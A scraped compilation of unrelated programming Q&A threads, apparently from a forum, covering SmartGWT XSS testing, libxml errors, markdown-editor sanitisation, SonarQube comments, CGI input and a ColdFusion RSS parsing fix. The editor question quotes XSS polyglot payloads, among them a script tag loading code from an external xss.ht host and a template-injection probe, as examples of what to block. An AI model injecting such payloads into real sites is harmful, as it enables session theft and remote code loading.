I am testing whether I can inject script code into a website which is using smartgwt and then queried out the input string to run the script.
I first input the following string into a text field on a webpage and submitted:
"<script>alert(1)</script>"(without double quotes),
then I queried out the input string which is loaded through a smartgwt table component.
With a HTML debug tool, I can see that the input string was placed inside a <nobr> tag inside a <td> tag, the HTML characters inside the input string wasn't encoded, but the alert(1) code doesn't execute and no popup was shown, does smartgwt handle the XSS automatically, or there is other reason that the script isn't executed?
Related
I'm using libxml to parse and build a tree from html:
htmlDoc = htmlParseDoc((xmlChar*)s.c_str(), "windows-1252");
s contains the HTML in a string. I am using curl to retrieve the HTML and storing it in s. The functionality is working exactly as I want however I just want to remove the htmlParsing errors from being output to the console:
HTML parser error : htmlParseStartTag: misplaced <body> tag
<html><head><title>UPC-E Home Page</title></head><body topmargin=8 leftmargin=8
I get these errors because every once in a while curl will timeout and won't be able to retrieve the entirety of the HTML. This is fine, I just want to ignore it and try again. However, I don't want the user to see these errors. How can I disable these from being output to the user?
I want to know that how can I prevent script code and HTML attributes to stop from execution in editor of my website?
If someone add script tags with external link of code or call a function of jQuery in some attribute of HTML tag.
I am using markdown editor and django framework.
For example:
'>"></title></style></textarea></script><img src=x onerror=alert(document.domain)></script>
'>"></title></style></textarea></script><script/src=https://samengmg.xss.ht></script>
{{7*7}}{7*7}
use htmlEscape="true" for all input fields.
If you are displaying a value, try fn:escapeXml(value). You need to import jstl functions taglib
SonarQube has webservice api to add comment api/issues/add_comment.This webservice api takes parameter as issue_id and text. I want to add html text not the plain text. whatever text, i am passing , it consider as normal text.
How to pass htmlText/markdown as comment using webserive add comment api
Example :
http://localhost:9000/api/issues/add_comment?text="visit this issue" &issue=abcd-e0a3-49dc-9d46-45bf92748361
The above api writes everything as normal text in sonar issue comment section.
This is not possible to post a comment in HTML format, simply to avoid security issues like XSS.
The "text" parameter accepts SonarQube Markdown format, for which you can see the online documentation at https://sonarqube.com/markdown/help
i am trying to find out, how to get input from html inputs using c++. In windows you can send WM_GETTEXT to the window and it returns text, that you wanted. But is there any way to do the same thing in web interface?.
I am not interesting in sniffing packets now.
For example. Some site has html intput which expects name. I write name to the input. And then i want to catch it with my program
If I understood correctly what you want to do, you have to set up a web server that calls your C++ application via CGI. So, you'll have an HTML page (static or generated by your program) that will contain a form, that refers to the URL of your application. So, when the user will click Submit, the browser will issue a request to the webserver, which in turn will call your application, passing to it the various POST/GET parameters related to the form.
Your application then can process the data, extracting such parameters from the environment variables (if the data is passed using the GET method) or from the standard input (if the POST method is used). To generate the output page (along with the output HTTP header) you'll simply have to write it to the standard output.
One thing I can think of (if you're using Linux) is using wget via system() from within your C++ app.
Wget to fetch the html page and output it to a file, parse the file for the URL of the form and data that it needs, pass the response as POST / GET via wget and so on.
That is, if I understood what you meant by "do it from existing page" correctly.
I'm having a vexing time displaying a remote RSS feed on an intranet site. I'm using the MM_ XSLTransform.cfc version 0.6.2 to pull in the feed and a basic xsl to output. The feed url is www.fedsources.com/FedsourcesNet/RssFeeds/RSS_MarketFlash.aspx. If you open it in a browser, you'll see it appears to be an ordinary RSS feed. But when I try to display it in CF, I get the following" MM_ XSLTransform error.
www.fedsources.com/FedsourcesNet/RssFeeds/RSS_ MarketFlash.aspx is not a valid XML document.
Parsing www.fedsources.com/FedsourcesNet/RssFeeds/RSS_ MarketFlash.aspx
An error occured while Parsing an XML document.
Content is not allowed in prolog." (the actual error included http:// in the urls. Then the feed is dumped as part of the error message.
What's especially frustrating is if I view the source of the RSS and copy and paste it into a text file, then parse that text file, it displays fine.
Running CF version 7.
I tried changing the charset from UTF-8 to windows-1252, but that added some weird characters at the beginning and didn't help. I also tried stripping out everything between <channel> and <item> but that didn't help.
I've successfully parsed other RSS feeds outside our firewall using the same code. Is there something about the aspx extension that's causing the error? Any thoughts? Anyone?
Thanks.
What's the exact code that you're using to parse the XML document? This particular error normally happens if you have some data before the <?xml?> tag in the document, even a single space can cause a problem.
I'm not familiar with the particular CFC you mentioned, so I can't troubleshoot that one for you, but make sure that you use the Trim function around any XML content you're going to try to parse.
UPDATE: A quick Google search led me to this post from Ben Nadel: http://www.bennadel.com/blog/1206-Content-Is-Not-Allowed-In-Prolog-ColdFusion-XML-And-The-Byte-Order-Mark-BOM-.htm
You need to remove the Byte-Order-Mark from the feed. This code works without an error:
<cfhttp method="get" url="http://www.fedsources.com/FedsourcesNet/RssFeeds/RSS_MarketFlash.aspx" />
<cfset xmlResult = XmlParse(REReplace( cfhttp.FileContent, "^[^<]*", "", "all" )) />
<cfdump var="#XMLParse(xmlResult)#" />